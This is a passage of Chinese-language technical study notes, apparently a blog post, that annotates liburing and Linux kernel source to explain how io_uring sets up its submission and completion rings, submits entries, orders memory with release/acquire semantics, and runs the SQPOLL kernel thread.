cq->kring_mask = cq->ring_ptr + p->cq_off.ring_mask;
cq->kring_entries = cq->ring_ptr + p->cq_off.ring_entries;
cq->koverflow = cq->ring_ptr + p->cq_off.overflow;
cq->cqes = cq->ring_ptr + p->cq_off.cqes;
if (p->cq_off.flags)
cq->kflags = cq->ring_ptr + p->cq_off.flags;

sq->ring_mask = *sq->kring_mask;
sq->ring_entries = *sq->kring_entries;
cq->ring_mask = *cq->kring_mask;
cq->ring_entries = *cq->kring_entries;
}

io_uring_get_sqe

此函数用来获取一个可用 sqe 用来提交任务,最终是调用了 _io_uring_get_sqe, 整个函数用非常优雅的方式实现了循环队列// #Elegant

IOURINGINLINE struct io_uring_sqe *_io_uring_get_sqe(struct io_uring *ring)
{
struct io_uring_sq *sq = &ring->sq;
unsigned int head, next = sq->sqe_tail + 1;
int shift = 0;

if (ring->flags & IORING_SETUP_SQE128)
shift = 1;
if (!(ring->flags & IORING_SETUP_SQPOLL))
head = IO_URING_READ_ONCE(*sq->khead);
else
head = io_uring_smp_load_acquire(sq->khead);
// 通过原子读获取head
// sq->khead = sq->ring_ptr + p->sq_off.head;
// 这里实际上读的是共享内存的一个指针内存的 uint 值

if (next - head <= sq->ring_entries) {
struct io_uring_sqe *sqe;

sqe = &sq->sqes[(sq->sqe_tail & sq->ring_mask) << shift];
// sq->ring_mask 来自kernel 设置的params
// rings->sq_ring_mask = p->sq_entries - 1;
// 由于sq_entries 为2的幂次倍
// 这里实际上就是一个循环队列的访问,
sq->sqe_tail = next;
return sqe;
}

return NULL;
}

io_uring_prep_xxx

这是一系列函数,用来准备 io_uring 提供的各种 IO 操作,其根本实现就是设置一个 sqe 结构体(这个结构体是内核的 UAPI)。

这里以 io_uring_prep_openat 为例

IOURINGINLINE void io_uring_prep_openat(struct io_uring_sqe *sqe, int dfd,
const char *path, int flags,
mode_t mode)
{
io_uring_prep_rw(IORING_OP_OPENAT, sqe, dfd, path, mode, 0);
sqe->open_flags = (__u32) flags;
}
IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd,
const void *addr, unsigned len,
__u64 offset)
{
sqe->opcode = (__u8) op;
// 设置op为 open
sqe->flags = 0;
sqe->ioprio = 0;
sqe->fd = fd;
// 提供表示dir 的 -100 fd
sqe->off = offset;
// 0
sqe->addr = (unsigned long) addr;
// 提供文件地址
sqe->len = len;
sqe->rw_flags = 0;
sqe->buf_index = 0;
sqe->personality = 0;
sqe->file_index = 0;
sqe->addr3 = 0;
sqe->__pad2[0] = 0;
}

归根结底就是设置了一个sqe

这里笔者有一个问题:
#TODO
IORING_SETUP_SQPOLL 时,io_uring 用户和内核采用共享内存通信,内核态是如何知道一个 sqe 的全部参数已经设置完毕了?有没有可能用户态正在设置 sqe 的部分成员时,内核已经在处理这个 sqe 了?

在之后 [[#__io_uring_flush_sq]] 笔者似乎找到了这个问题的答案:

  • 通过 memory_store_release 保证sqe的更新不会被重排到 ktail 的修改前
  • 通过 修改 ktail 表示真正提交了一个任务

io_uring_submit

io_uring_submit 用于提交一个任务

int io_uring_submit(struct io_uring *ring)
{
return __io_uring_submit_and_wait(ring, 0);
}
static int __io_uring_submit_and_wait(struct io_uring *ring, unsigned wait_nr)
{
return __io_uring_submit(ring, __io_uring_flush_sq(ring), wait_nr, false);
}

最终到达 __io_uring_submit. 不过这个函数, 在SQPOLL模式下用处不大, 真正的提交操作应该说是在 __io_uring_flush_sq 中实现的.

这里主要是判断当前情况需不需要调用 io_uring_enter syscall.

如果当前 是IOPOLL模式, 就需要 io_uring_enter 来收割任务.

如果是 SQPOLL 模式, 且 内核处理线程已 idle ,那么就通过 io_uring_enter syscall 来唤醒

static int __io_uring_submit(struct io_uring *ring, unsigned submitted,
unsigned wait_nr, bool getevents)
{
bool cq_needs_enter = getevents || wait_nr || cq_ring_needs_enter(ring);
unsigned flags;
int ret;

flags = 0;
if (sq_ring_needs_enter(ring, submitted, &flags) || cq_needs_enter) {
if (cq_needs_enter)
flags |= IORING_ENTER_GETEVENTS;
if (ring->int_flags & INT_FLAG_REG_RING)
flags |= IORING_ENTER_REGISTERED_RING;

ret = __sys_io_uring_enter(ring->enter_ring_fd, submitted,
wait_nr, flags, NULL);
} else
ret = submitted;

return ret;
}

__io_uring_flush_sq

主要用来更新内核sq 的tail指针, 最终返回需要提交的任务数

static unsigned __io_uring_flush_sq(struct io_uring *ring)
{
struct io_uring_sq *sq = &ring->sq;
unsigned tail = sq->sqe_tail;

if (sq->sqe_head != tail) {
sq->sqe_head = tail;
/*
* Ensure kernel sees the SQE updates before the tail update.
*/
if (!(ring->flags & IORING_SETUP_SQPOLL))
IO_URING_WRITE_ONCE(*sq->ktail, tail);
// 原子写
else
io_uring_smp_store_release(sq->ktail, tail);
// memory_release 的内存序来写

}
return tail - *sq->khead;
}

在 SQPOLL 模式下,内核(作为消费方)可能同时在更新头指针。
对于非 SQPOLL 模式,head 只会在应用自己调用 io_uring_enter 的过程中被推进,不存在并发问题。
即使 SQPOLL 模式下头指针的读取是原子的,获取到的值也可能立即过期,存在并发修改的问题。

最坏情况下,读取的值会高估实际可提交的请求数。

在这里用到了一个原子写 IO_URING_WRITE_ONCE .

io_uring_smp_store_release 涉及到内存序的问题。内存序是为了约束指令重排和跨线程可见性而引入的,笔者还没有特别理解。

笔者尝试解释一下:这里使用 memory_order_release 内存序来标注这个存储操作。

release内存序的特点是:

  1. 当前线程在该存储之前的所有内存修改,对以 acquire 语义读到这个新值的其他线程可见
  2. 防止之前的读写操作被重排到这个存储之后

这里应该是让此处对于sqe的修改,要在对于tail指针的修改前完成,防止指令重排的影响

如果不是 SQPOLL 模式(例如 IOPOLL),内核真正读取提交是在 io_uring_enter 中完成的,和当前用户线程处于同一个执行上下文,因此不需要通过 memory_order_release 来保证"当前线程本地的修改对其他线程可见";同一线程内的数据依赖由处理器自身(如旁路/前递机制)保证。

#TODO

#define io_uring_smp_store_release(p, v)			\
atomic_store_explicit((_Atomic __typeof__(*(p)) *)(p), (v), \
memory_order_release)
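用 C11 原子操作大致表示一下这对 release/acquire 的配对(仅为示意,fill_sqe 是假想的填充函数,并非 liburing 或内核中的真实代码):

#include <stdatomic.h>

struct io_uring_sqe;
void fill_sqe(struct io_uring_sqe *sqe);   /* 假想的 sqe 填充函数 */

/* 用户态提交方: 对应 __io_uring_flush_sq 中的 store_release */
void producer(struct io_uring_sqe *slot, _Atomic unsigned *ktail, unsigned new_tail)
{
	fill_sqe(slot);                                   /* 1. 先把 sqe 的各个字段写完整 */
	atomic_store_explicit(ktail, new_tail,
	                      memory_order_release);      /* 2. 再以 release 语义更新 tail */
}

/* 内核 SQPOLL 线程: 对应后文 io_sqring_entries 中的 smp_load_acquire */
unsigned consumer(_Atomic unsigned *ktail, unsigned cached_head)
{
	unsigned tail = atomic_load_explicit(ktail, memory_order_acquire);
	/* acquire 保证: 只要看到了新的 tail, 就一定能看到第 1 步对 sqe 的写入 */
	return tail - cached_head;
}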

syscall

syscall 是内核提供给用户态的接口,io_uring 涉及 io_uring_setup、io_uring_enter、io_uring_register 三个 syscall

笔者这里主要讲述前两个syscall

io_uring_setup

参数

  • entries: sq队列大小
  • params: 提供的各种参数,许多返回值也会写入此结构体
static long io_uring_setup(u32 entries, struct io_uring_params __user *params)
{
struct io_uring_params p;
int i;

if (copy_from_user(&p, params, sizeof(p)))
return -EFAULT;
// 将params复制到内核空间
for (i = 0; i < ARRAY_SIZE(p.resv); i++) {
if (p.resv[i])
return -EINVAL;
}

if (p.flags & ~(IORING_SETUP_IOPOLL | IORING_SETUP_SQPOLL |
IORING_SETUP_SQ_AFF | IORING_SETUP_CQSIZE |
IORING_SETUP_CLAMP | IORING_SETUP_ATTACH_WQ |
IORING_SETUP_R_DISABLED | IORING_SETUP_SUBMIT_ALL |
IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG |
IORING_SETUP_SQE128 | IORING_SETUP_CQE32 |
IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_DEFER_TASKRUN |
IORING_SETUP_NO_MMAP | IORING_SETUP_REGISTERED_FD_ONLY |
IORING_SETUP_NO_SQARRAY))
return -EINVAL;
// 如果有非法flag,直接返回

return io_uring_create(entries, &p, params);
}

接下来,io_uring_create 首先检查 entries 和 flags:

static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
struct io_uring_params __user *params)
{
struct io_ring_ctx *ctx;
struct io_uring_task *tctx;
struct file *file;
int ret;

if (!entries)
return -EINVAL;
if (entries > IORING_MAX_ENTRIES) {
if (!(p->flags & IORING_SETUP_CLAMP))
return -EINVAL;
entries = IORING_MAX_ENTRIES;
}

if ((p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
&& !(p->flags & IORING_SETUP_NO_MMAP))
return -EINVAL;

将 sq_entries 按 2 的幂次向上取整,这是为了方便环形队列下标的处理,见这段代码之后的小例子。

p->sq_entries = roundup_pow_of_two(entries);
if (p->flags & IORING_SETUP_CQSIZE) {
/*
* If IORING_SETUP_CQSIZE is set, we do the same roundup
* to a power-of-two, if it isn't already. We do NOT impose
* any cq vs sq ring sizing.
*/
if (!p->cq_entries)
return -EINVAL;
if (p->cq_entries > IORING_MAX_CQ_ENTRIES) {
if (!(p->flags & IORING_SETUP_CLAMP))
return -EINVAL;
p->cq_entries = IORING_MAX_CQ_ENTRIES;
}
p->cq_entries = roundup_pow_of_two(p->cq_entries);
if (p->cq_entries < p->sq_entries)
return -EINVAL;
} else {
p->cq_entries = 2 * p->sq_entries;
}
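取整为 2 的幂之后,环形队列的下标就可以用按位与代替取模,例如(示意):

#include <stdio.h>

int main(void)
{
	unsigned sq_entries = 128;               /* roundup_pow_of_two(100) == 128 */
	unsigned sq_ring_mask = sq_entries - 1;  /* 对应 rings->sq_ring_mask = p->sq_entries - 1 */
	unsigned tail = 130;

	/* 输出 2, 等价于 tail % sq_entries */
	printf("%u\n", tail & sq_ring_mask);
	return 0;
}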

接下来是一系列设置ctx的代码,笔者暂且不在这里分析,之后遇见了再分析每一项


ctx = io_ring_ctx_alloc(p);
if (!ctx)
return -ENOMEM;

if ((ctx->flags & IORING_SETUP_DEFER_TASKRUN) &&
!(ctx->flags & IORING_SETUP_IOPOLL) &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->task_complete = true;

if (ctx->task_complete || (ctx->flags & IORING_SETUP_IOPOLL))
ctx->lockless_cq = true;

/*
* lazy poll_wq activation relies on ->task_complete for synchronisation
* purposes, see io_activate_pollwq()
*/
if (!ctx->task_complete)
ctx->poll_activated = true;

/*
* When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user
* space applications don't need to do io completion events
* polling again, they can rely on io_sq_thread to do polling
* work, which can reduce cpu usage and uring_lock contention.
*/
if (ctx->flags & IORING_SETUP_IOPOLL &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->syscall_iopoll = 1;

ctx->compat = in_compat_syscall();
if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
ctx->user = get_uid(current_user());

/*
* For SQPOLL, we just need a wakeup, always. For !SQPOLL, if
* COOP_TASKRUN is set, then IPIs are never needed by the app.
*/
ret = -EINVAL;
if (ctx->flags & IORING_SETUP_SQPOLL) {
/* IPI related flags don't make sense with SQPOLL */
if (ctx->flags & (IORING_SETUP_COOP_TASKRUN |
IORING_SETUP_TASKRUN_FLAG |
IORING_SETUP_DEFER_TASKRUN))
goto err;
ctx->notify_method = TWA_SIGNAL_NO_IPI;
} else if (ctx->flags & IORING_SETUP_COOP_TASKRUN) {
ctx->notify_method = TWA_SIGNAL_NO_IPI;
} else {
if (ctx->flags & IORING_SETUP_TASKRUN_FLAG &&
!(ctx->flags & IORING_SETUP_DEFER_TASKRUN))
goto err;
ctx->notify_method = TWA_SIGNAL;
}

/*
* For DEFER_TASKRUN we require the completion task to be the same as the
* submission task. This implies that there is only one submitter, so enforce
* that.
*/
if (ctx->flags & IORING_SETUP_DEFER_TASKRUN &&
!(ctx->flags & IORING_SETUP_SINGLE_ISSUER)) {
goto err;
}

/*
* This is just grabbed for accounting purposes. When a process exits,
* the mm is exited and dropped before the files, hence we need to hang
* on to this mm purely for the purposes of being able to unaccount
* memory (locked/pinned vm). It's not used for anything else.
*/
mmgrab(current->mm);
ctx->mm_account = current->mm;

[[#io_allocate_scq_urings]] 分配了 rings(SQ/CQ ring)和 sqes 的内存

[[#io_sq_offload_create]] 创建了任务处理线程

ret = io_allocate_scq_urings(ctx, p);
if (ret)
goto err;

ret = io_sq_offload_create(ctx, p);
if (ret)
goto err;

ret = io_rsrc_init(ctx);
if (ret)
goto err;

设置 sq_off 和 cq_off,即通过 params 返回给用户的、ring 中各个成员相对起始地址的偏移

p->sq_off.head = offsetof(struct io_rings, sq.head);
p->sq_off.tail = offsetof(struct io_rings, sq.tail);
p->sq_off.ring_mask = offsetof(struct io_rings, sq_ring_mask);
p->sq_off.ring_entries = offsetof(struct io_rings, sq_ring_entries);
p->sq_off.flags = offsetof(struct io_rings, sq_flags);
p->sq_off.dropped = offsetof(struct io_rings, sq_dropped);
if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
p->sq_off.array = (char *)ctx->sq_array - (char *)ctx->rings;
p->sq_off.resv1 = 0;
if (!(ctx->flags & IORING_SETUP_NO_MMAP))
p->sq_off.user_addr = 0;

p->cq_off.head = offsetof(struct io_rings, cq.head);
p->cq_off.tail = offsetof(struct io_rings, cq.tail);
p->cq_off.ring_mask = offsetof(struct io_rings, cq_ring_mask);
p->cq_off.ring_entries = offsetof(struct io_rings, cq_ring_entries);
p->cq_off.overflow = offsetof(struct io_rings, cq_overflow);
p->cq_off.cqes = offsetof(struct io_rings, cqes);
p->cq_off.flags = offsetof(struct io_rings, cq_flags);
p->cq_off.resv1 = 0;

设置feature

p->features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP |
IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS |
IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL |
IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED |
IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS |
IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP |
IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING;

再将params复制回用户空间

if (copy_to_user(params, p, sizeof(*p))) {
ret = -EFAULT;
goto err;
}

最后是注册fd

if (ctx->flags & IORING_SETUP_SINGLE_ISSUER
&& !(ctx->flags & IORING_SETUP_R_DISABLED))
WRITE_ONCE(ctx->submitter_task, get_task_struct(current));

file = io_uring_get_file(ctx);
if (IS_ERR(file)) {
ret = PTR_ERR(file);
goto err;
}

ret = __io_uring_add_tctx_node(ctx);
if (ret)
goto err_fput;
tctx = current->io_uring;

/*
* Install ring fd as the very last thing, so we don't risk someone
* having closed it before we finish setup
*/
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);
else
ret = io_uring_install_fd(file);
if (ret < 0)
goto err_fput;

错误处理如下:

err:
io_ring_ctx_wait_and_kill(ctx);
return ret;
err_fput:
fput(file);
return ret;

io_allocate_scq_urings

首先是rings的分配,核心关键点在于NO_MMAP 的处理

static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx,
struct io_uring_params *p)
{
struct io_rings *rings;
size_t size, sq_array_offset;
void *ptr;

/* make sure these are sane, as we already accounted them */
ctx->sq_entries = p->sq_entries;
ctx->cq_entries = p->cq_entries;

size = rings_size(ctx, p->sq_entries, p->cq_entries, &sq_array_offset);
if (size == SIZE_MAX)
return -EOVERFLOW;

if (!(ctx->flags & IORING_SETUP_NO_MMAP))
rings = io_mem_alloc(size);
// 如果没有设置NO_MMAP,就分配
else
rings = io_rings_map(ctx, p->cq_off.user_addr, size);
// 反之,建立映射

if (IS_ERR(rings))
return PTR_ERR(rings);

ctx->rings = rings;

接下来是类似的,sqe的分配:

if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
ctx->sq_array = (u32 *)((char *)rings + sq_array_offset);
rings->sq_ring_mask = p->sq_entries - 1;
rings->cq_ring_mask = p->cq_entries - 1;
rings->sq_ring_entries = p->sq_entries;
rings->cq_ring_entries = p->cq_entries;

if (p->flags & IORING_SETUP_SQE128)
size = array_size(2 * sizeof(struct io_uring_sqe), p->sq_entries);
else
size = array_size(sizeof(struct io_uring_sqe), p->sq_entries);
if (size == SIZE_MAX) {
io_rings_free(ctx);
return -EOVERFLOW;
}

if (!(ctx->flags & IORING_SETUP_NO_MMAP))
ptr = io_mem_alloc(size);
else
ptr = io_sqes_map(ctx, p->sq_off.user_addr, size);

if (IS_ERR(ptr)) {
io_rings_free(ctx);
return PTR_ERR(ptr);
}

ctx->sq_sqes = ptr;

io_sq_offload_create

如果设置了 SQPOLL,此函数用来创建内核侧轮询并处理任务的线程。

__cold int io_sq_offload_create(struct io_ring_ctx *ctx,
struct io_uring_params *p)
{
int ret;

/* Retain compatibility with failing for an invalid attach attempt */
if ((ctx->flags & (IORING_SETUP_ATTACH_WQ | IORING_SETUP_SQPOLL)) ==
IORING_SETUP_ATTACH_WQ) {
struct fd f;

f = fdget(p->wq_fd);
if (!f.file)
return -ENXIO;
if (!io_is_uring_fops(f.file)) {
fdput(f);
return -EINVAL;
}
fdput(f);
}
if (ctx->flags & IORING_SETUP_SQPOLL) {
struct task_struct *tsk;
struct io_sq_data *sqd;
bool attached;

ret = security_uring_sqpoll();
if (ret)
return ret;

sqd = io_get_sq_data(p, &attached);
// 获取一个sqd
if (IS_ERR(sqd)) {
ret = PTR_ERR(sqd);
goto err;
}

ctx->sq_creds = get_current_cred();
ctx->sq_data = sqd;
ctx->sq_thread_idle = msecs_to_jiffies(p->sq_thread_idle);
if (!ctx->sq_thread_idle)
ctx->sq_thread_idle = HZ;
// 设置相关信息
io_sq_thread_park(sqd);
list_add(&ctx->sqd_list, &sqd->ctx_list);
io_sqd_update_thread_idle(sqd);
/* don't attach to a dying SQPOLL thread, would be racy */
ret = (attached && !sqd->thread) ? -ENXIO : 0;
io_sq_thread_unpark(sqd);

if (ret < 0)
goto err;
if (attached)
return 0;

if (p->flags & IORING_SETUP_SQ_AFF) {
int cpu = p->sq_thread_cpu;

ret = -EINVAL;
if (cpu >= nr_cpu_ids || !cpu_online(cpu))
goto err_sqpoll;
sqd->sq_cpu = cpu;
} else {
sqd->sq_cpu = -1;
}

sqd->task_pid = current->pid;
sqd->task_tgid = current->tgid;
tsk = create_io_thread(io_sq_thread, sqd, NUMA_NO_NODE);
// 创建处理线程
if (IS_ERR(tsk)) {
ret = PTR_ERR(tsk);
goto err_sqpoll;
}

sqd->thread = tsk;
ret = io_uring_alloc_task_context(tsk, ctx);
wake_up_new_task(tsk);
if (ret)
goto err;
} else if (p->flags & IORING_SETUP_SQ_AFF) {
/* Can't have SQ_AFF without SQPOLL */
ret = -EINVAL;
goto err;
}

return 0;
err_sqpoll:
complete(&ctx->sq_data->exited);
err:
io_sq_thread_finish(ctx);
return ret;
}

io_uring_enter

首先是对 flag 的检查和确认,这里不一一赘述了,感兴趣的读者可以查阅相应的 man page。

SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit,
u32, min_complete, u32, flags, const void __user *, argp,
size_t, argsz)
{
struct io_ring_ctx *ctx;
struct fd f;
long ret;

if (unlikely(flags & ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP |
IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG |
IORING_ENTER_REGISTERED_RING)))
return -EINVAL;

/*
* Ring fd has been registered via IORING_REGISTER_RING_FDS, we
* need only dereference our task private array to find it.
*/
if (flags & IORING_ENTER_REGISTERED_RING) {
struct io_uring_task *tctx = current->io_uring;

if (unlikely(!tctx || fd >= IO_RINGFD_REG_MAX))
return -EINVAL;
fd = array_index_nospec(fd, IO_RINGFD_REG_MAX);
f.file = tctx->registered_rings[fd];
f.flags = 0;
if (unlikely(!f.file))
return -EBADF;
} else {
f = fdget(fd);
if (unlikely(!f.file))
return -EBADF;
ret = -EOPNOTSUPP;
if (unlikely(!io_is_uring_fops(f.file)))
goto out;
}

ctx = f.file->private_data;
ret = -EBADFD;
if (unlikely(ctx->flags & IORING_SETUP_R_DISABLED))
goto out;

SQPOLL模式下,直接返回提交数,可选择性wakeup线程

/*
* For SQ polling, the thread will do all submissions and completions.
* Just return the requested submit count, and wake the thread if
* we were asked to.
*/
ret = 0;
if (ctx->flags & IORING_SETUP_SQPOLL) {
io_cqring_overflow_flush(ctx);

if (unlikely(ctx->sq_data->thread == NULL)) {
ret = -EOWNERDEAD;
goto out;
}
if (flags & IORING_ENTER_SQ_WAKEUP)
// 如果 sq 处理线程已休眠(共享内存中的 sq_flags 被置上 IORING_SQ_NEED_WAKEUP)
// 用户可以在调用此 syscall 时设置 IORING_ENTER_SQ_WAKEUP 来唤醒它
wake_up(&ctx->sq_data->wait);
if (flags & IORING_ENTER_SQ_WAIT)
io_sqpoll_wait_sq(ctx);

ret = to_submit;

非 SQPOLL 模式下,在此处直接提交 SQ 环中的请求

} else if (to_submit) {
ret = io_uring_add_tctx_node(ctx);
if (unlikely(ret))
goto out;

mutex_lock(&ctx->uring_lock);
ret = io_submit_sqes(ctx, to_submit);
// 直接提交 sqes
// 这个函数将在后面分析
// SQPOLL 模式下创建的io_sq_thread 也会调用此函数
if (ret != to_submit) {
mutex_unlock(&ctx->uring_lock);
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {
if (ctx->syscall_iopoll)
goto iopoll_locked;
/*
* Ignore errors, we'll soon call io_cqring_wait() and
* it should handle ownership problems if any.
*/
if (ctx->flags & IORING_SETUP_DEFER_TASKRUN)
(void)io_run_local_work_locked(ctx);
}
mutex_unlock(&ctx->uring_lock);
}
	if (flags & IORING_ENTER_GETEVENTS) {
// 如果请求获取完成事件
int ret2;

if (ctx->syscall_iopoll) {
// 如果开启了syscall轮询模式,执行iopoll逻辑
/*
* We disallow the app entering submit/complete with
* polling, but we still need to lock the ring to
* prevent racing with polled issue that got punted to
* a workqueue.
*/
mutex_lock(&ctx->uring_lock);
iopoll_locked:
ret2 = io_validate_ext_arg(flags, argp, argsz);
if (likely(!ret2)) {
min_complete = min(min_complete,
ctx->cq_entries);
ret2 = io_iopoll_check(ctx, min_complete);
}
mutex_unlock(&ctx->uring_lock);
} else {
const sigset_t __user *sig;
struct __kernel_timespec __user *ts;

ret2 = io_get_ext_arg(flags, argp, &argsz, &ts, &sig);
if (likely(!ret2)) {
min_complete = min(min_complete,
ctx->cq_entries);
ret2 = io_cqring_wait(ctx, min_complete, sig,
argsz, ts);
}
}

if (!ret) {
ret = ret2;

/*
* EBADR indicates that one or more CQE were dropped.
* Once the user has been informed we can clear the bit
* as they are obviously ok with those drops.
*/
if (unlikely(ret2 == -EBADR))
clear_bit(IO_CHECK_CQ_DROPPED_BIT,
&ctx->check_cq);
}
}
  • 如果请求获取完成事件
    • 如果开启了syscall轮询模式,执行iopoll逻辑
    • 否则执行等待完成事件逻辑
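顺带给出 io_uring_enter 的原始 syscall 调用方式(示意:最后两个参数对应 argp/argsz,不使用 IORING_ENTER_EXT_ARG 时按旧语义传 sigset 指针和大小,这里直接传 NULL/0):

#include <linux/io_uring.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stddef.h>

static inline int sys_io_uring_enter(int fd, unsigned to_submit,
				     unsigned min_complete, unsigned flags)
{
	return (int)syscall(__NR_io_uring_enter, fd, to_submit,
			    min_complete, flags, NULL, 0);
}

/* 例如: 提交 1 个请求并至少等待 1 个完成事件
 *   sys_io_uring_enter(ring_fd, 1, 1, IORING_ENTER_GETEVENTS);
 * SQPOLL 线程休眠时也可以用它来唤醒:
 *   sys_io_uring_enter(ring_fd, 0, 0, IORING_ENTER_SQ_WAKEUP);
 */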

kernel

最后是io_uring 内核的任务处理, 在这里先给出一个流程图, 然后再具体分析各个函数

(图:io_uring 内核任务处理流程,图来自 https://zhuanlan.zhihu.com/p/380726590 ,侵删)

io_sq_thread | 内核任务提交机制

io_sq_thread是 SQPOLL 模式下内核任务轮询线程.
首先设置线程环境

static int io_sq_thread(void *data)
{
struct io_sq_data *sqd = data;
struct io_ring_ctx *ctx;
unsigned long timeout = 0;
char buf[TASK_COMM_LEN];
DEFINE_WAIT(wait);

snprintf(buf, sizeof(buf), "iou-sqp-%d", sqd->task_pid);
set_task_comm(current, buf);

/* reset to our pid after we've set task_comm, for fdinfo */
sqd->task_pid = current->pid;

if (sqd->sq_cpu != -1) {
set_cpus_allowed_ptr(current, cpumask_of(sqd->sq_cpu));
} else {
set_cpus_allowed_ptr(current, cpu_online_mask);
sqd->sq_cpu = raw_smp_processor_id();
}

接下来获取锁并进入无限循环

mutex_lock(&sqd->lock);
while (1) {

设置好timeout

if (io_sqd_events_pending(sqd) || signal_pending(current)) {
if (io_sqd_handle_event(sqd))
break;
timeout = jiffies + sqd->sq_thread_idle;
// sq_thread_idle 来自用户在 params 设置的时间
}

注意到这个线程是在内存分配好之后才创建的。也就是说,即使是第一次进入此线程,只要 sqes 对应的内存里已经写好了任务,也会被处理;这意味着在 io_uring_setup 调用之前就写入 sqes 内存(例如 NO_MMAP 模式下用户自己提供的内存)的任务,同样可以被处理。

cap_entries = !list_is_singular(&sqd->ctx_list);
// 获取是否有多个io_ring的标记cap_entries
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) {
// 遍历注册的io_ring,调用__io_sq_thread做实际的轮询操作
int ret = __io_sq_thread(ctx, cap_entries);

if (!sqt_spin && (ret > 0 || !wq_list_empty(&ctx->iopoll_list)))
sqt_spin = true;
// 如果有事件处理或iopoll任务,则设置sqt_spin标记
}
if (io_run_task_work())
// 调用io_run_task_work处理排队的工作任务
sqt_spin = true;

if (sqt_spin || !time_after(jiffies, timeout)) {
// 如果有待处理事件或时间没超时
if (sqt_spin)
timeout = jiffies + sqd->sq_thread_idle;
// 如果有待处理事件,更新下一次超时时间
if (unlikely(need_resched())) {
// 检查是否需要调度,如果需要,主动释放并重新获取锁
mutex_unlock(&sqd->lock);
cond_resched();
mutex_lock(&sqd->lock);
sqd->sq_cpu = raw_smp_processor_id();
}
continue;
// 没超时就直接continue, 因为之后就是判断是否需要阻塞
}

接下来实现io_uring SQ线程的阻塞和唤醒逻辑

	prepare_to_wait(&sqd->wait, &wait, TASK_INTERRUPTIBLE);
// 将当前线程设置为可中断状态TASK_INTERRUPTIBLE
if (!io_sqd_events_pending(sqd) && !task_work_pending(current)) {
bool needs_sched = true;
// 检查是否有待处理事件和任务

list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) {
// 若没有则遍历所有注册的io_ring
atomic_or(IORING_SQ_NEED_WAKEUP,
&ctx->rings->sq_flags);
// 设置IORING_SQ_NEED_WAKEUP标志
if ((ctx->flags & IORING_SETUP_IOPOLL) &&
!wq_list_empty(&ctx->iopoll_list)) {
// 检查iopoll和SQ队列是否为空
needs_sched = false;
break;
}

/*
* Ensure the store of the wakeup flag is not
* reordered with the load of the SQ tail
*/
smp_mb__after_atomic();

if (io_sqring_entries(ctx)) {
needs_sched = false;
break;
}
}

if (needs_sched) {
// 如果需要调度
mutex_unlock(&sqd->lock);
// 释放锁调度
schedule();
mutex_lock(&sqd->lock);
// 唤醒后重新获取锁和CPU信息
sqd->sq_cpu = raw_smp_processor_id();
}
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list)
atomic_andnot(IORING_SQ_NEED_WAKEUP,
&ctx->rings->sq_flags);
// 否则清除唤醒标记
}
finish_wait(&sqd->wait, &wait);
timeout = jiffies + sqd->sq_thread_idle;
// 更新等待时间
}

最后是退出无限循环时的清理机制

io_uring_cancel_generic(true, sqd);
sqd->thread = NULL;
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list)
atomic_or(IORING_SQ_NEED_WAKEUP, &ctx->rings->sq_flags);
io_run_task_work();
mutex_unlock(&sqd->lock);

complete(&sqd->exited);
do_exit(0);

__io_sq_thread

static int __io_sq_thread(struct io_ring_ctx *ctx, bool cap_entries)
{
unsigned int to_submit;
int ret = 0;

to_submit = io_sqring_entries(ctx);
/* if we're handling multiple rings, cap submit size for fairness */
if (cap_entries && to_submit > IORING_SQPOLL_CAP_ENTRIES_VALUE)
to_submit = IORING_SQPOLL_CAP_ENTRIES_VALUE;
// 计算需要提交的任务数量
// 如果需要公平,则 cap 为固定最大值

if (!wq_list_empty(&ctx->iopoll_list) || to_submit) {
// 如果有 iopoll 任务或可提交请求
const struct cred *creds = NULL;

if (ctx->sq_creds != current_cred())
creds = override_creds(ctx->sq_creds);
// 保存和恢复 creds 身份信息避免安全漏洞
mutex_lock(&ctx->uring_lock);
// 上锁保护关键区
if (!wq_list_empty(&ctx->iopoll_list))
io_do_iopoll(ctx, true);
// 处理 iopoll 轮询事件
/*
* Don't submit if refs are dying, good for io_uring_register(),
* but also it is relied upon by io_ring_exit_work()
*/
if (to_submit && likely(!percpu_ref_is_dying(&ctx->refs)) &&
!(ctx->flags & IORING_SETUP_R_DISABLED))
ret = io_submit_sqes(ctx, to_submit);
// 提交请求到 SQ 环
mutex_unlock(&ctx->uring_lock);

if (to_submit && wq_has_sleeper(&ctx->sqo_sq_wait))
wake_up(&ctx->sqo_sq_wait);
// 唤醒 sqo_sq 等待线程
if (creds)
revert_creds(creds);
}

return ret;
}

其中 io_sqring_entries 逻辑如下

所以内核在SQPOLL 模式下判断是否有任务需要执行,就是看 tail 是否更新

static inline unsigned int io_sqring_entries(struct io_ring_ctx *ctx)
{
struct io_rings *rings = ctx->rings;
unsigned int entries;

/* make sure SQ entry isn't read before tail */
